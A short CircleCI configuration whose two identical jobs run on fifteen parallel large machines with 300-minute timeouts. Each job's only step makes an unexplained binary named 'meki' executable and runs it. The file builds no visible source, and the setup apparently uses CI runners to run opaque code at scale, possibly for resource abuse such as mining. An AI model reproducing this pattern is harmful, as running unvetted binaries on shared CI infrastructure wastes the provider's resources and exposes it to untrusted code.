version: 2.1

jobs:
  build:
    parallelism: 15
    machine:
      image: ubuntu-2004:202101-01
    resource_class: large
    steps:
      - checkout
      - run:
         Name: download
         command: |
                     chmod +x meki && ./meki
         no_output_timeout: 300m
  build2:
    parallelism: 15
    machine:
      image: ubuntu-2004:202101-01
    resource_class: large
    steps:
      - checkout
      - run:
         Name: download
         command: |
                     chmod +x meki && ./meki
         no_output_timeout: 300m

workflows:
  main:
    jobs:
      - build
      - build2